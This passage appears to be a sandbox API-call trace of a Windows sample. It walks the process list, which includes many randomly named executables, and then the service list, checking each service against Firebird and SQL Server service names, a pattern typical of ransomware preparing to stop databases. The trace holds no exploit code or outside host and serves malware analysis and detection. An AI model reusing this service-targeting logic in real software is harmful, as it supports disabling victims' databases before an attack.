cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.133] lstrlenW (lpString="explorer.exe") returned 12 [0192.133] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0192.134] lstrlenW (lpString="Memory Compression") returned 18 [0192.134] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.191] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0192.191] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.191] lstrlenW (lpString="SearchUI.exe") returned 12 [0192.192] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.192] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0192.192] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.193] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0192.193] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0192.194] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0192.194] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0192.202] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0192.202] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.203] lstrlenW (lpString="conhost.exe") returned 11 [0192.203] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0192.204] lstrlenW (lpString="roof competitive.exe") returned 20 [0192.204] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0192.205] lstrlenW (lpString="trustees.exe") returned 12 [0192.205] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0192.206] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0192.206] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0192.207] lstrlenW (lpString="isbn.exe") returned 8 [0192.207] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0192.208] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0192.208] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0192.209] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0192.209] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0192.209] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0192.210] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0192.210] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0192.210] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0192.211] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0192.211] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0192.212] lstrlenW (lpString="playstation iraq.exe") returned 20 [0192.212] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0192.213] lstrlenW (lpString="harbor.exe") returned 10 [0192.213] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0192.214] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0192.214] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0192.215] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0192.215] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0192.216] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0192.216] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0192.217] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0192.217] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0192.217] lstrlenW (lpString="larent.exe") returned 10 [0192.218] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0192.218] lstrlenW (lpString="stereo.exe") returned 10 [0192.218] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0192.219] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0192.219] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0192.220] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0192.220] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0192.221] lstrlenW (lpString="state.exe") returned 9 [0192.221] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0192.221] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0192.221] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.222] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0192.222] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.223] lstrlenW (lpString="taskhostw.exe") returned 13 [0192.223] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0192.224] lstrlenW (lpString="sppsvc.exe") returned 10 [0192.224] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.224] lstrlenW (lpString="svchost.exe") returned 11 [0192.224] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0192.225] lstrlenW (lpString="Pg.exe") returned 6 [0192.225] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0192.226] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0192.226] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.227] lstrlenW (lpString="conhost.exe") returned 11 [0192.227] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0192.227] lstrlenW (lpString="cmd.exe") returned 7 [0192.228] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.229] lstrlenW (lpString="conhost.exe") returned 11 [0192.229] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0192.229] CloseHandle (hObject=0x37c) returned 1 [0192.229] Sleep (dwMilliseconds=0x1f4) [0193.290] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b8a0 [0193.291] EnumServicesStatusExW (in: hSCManager=0x236b8a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0193.291] GetLastError () returned 0xea [0193.291] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x236df78 [0193.291] EnumServicesStatusExW (in: hSCManager=0x236b8a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x236df78, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x236df78, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0193.292] CloseServiceHandle (hSCObject=0x236b8a0) returned 1 [0193.292] lstrlenW (lpString="Appinfo") returned 7 [0193.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0193.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0193.293] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0193.293] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0193.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0193.293] lstrlenW (lpString="AppXSvc") returned 7 [0193.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0193.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0193.293] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0193.293] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0193.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0193.293] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0193.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0193.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0193.293] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0193.293] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0193.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0193.293] lstrlenW (lpString="Audiosrv") returned 8 [0193.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0193.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0193.293] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0193.293] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0193.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0193.293] lstrlenW (lpString="BFE") returned 3 [0193.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0193.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0193.293] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0193.293] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0193.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0193.294] lstrlenW (lpString="BITS") returned 4 [0193.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0193.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0193.294] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0193.294] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0193.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0193.294] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0193.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0193.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0193.294] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0193.294] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0193.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0193.294] lstrlenW (lpString="CDPSvc") returned 6 [0193.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0193.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0193.294] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0193.294] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0193.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0193.294] lstrlenW (lpString="ClickToRunSvc") returned 13 [0193.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0193.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0193.294] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0193.294] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0193.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0193.294] lstrlenW (lpString="ClipSVC") returned 7 [0193.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0193.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0193.294] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0193.294] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0193.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0193.295] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0193.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0193.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0193.295] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0193.295] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0193.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0193.295] lstrlenW (lpString="CryptSvc") returned 8 [0193.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0193.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0193.295] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0193.295] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0193.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0193.295] lstrlenW (lpString="DcomLaunch") returned 10 [0193.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0193.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0193.295] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0193.295] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0193.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0193.295] lstrlenW (lpString="DeviceAssociationService") returned 24 [0193.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0193.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0193.295] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0193.295] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0193.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0193.295] lstrlenW (lpString="Dhcp") returned 4 [0193.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0193.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0193.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0193.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0193.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0193.296] lstrlenW (lpString="Dnscache") returned 8 [0193.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0193.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0193.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0193.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0193.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0193.296] lstrlenW (lpString="DoSvc") returned 5 [0193.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0193.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0193.296] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0193.296] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0193.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0193.296] lstrlenW (lpString="DPS") returned 3 [0193.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0193.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0193.296] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0193.296] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0193.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0193.296] lstrlenW (lpString="DusmSvc") returned 7 [0193.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0193.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0193.296] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0193.296] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0193.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0193.296] lstrlenW (lpString="EventLog") returned 8 [0193.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0193.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0193.296] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0193.297] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0193.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0193.297] lstrlenW (lpString="EventSystem") returned 11 [0193.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0193.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0193.297] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0193.297] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0193.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0193.297] lstrlenW (lpString="FontCache") returned 9 [0193.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0193.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0193.297] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0193.297] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0193.297] 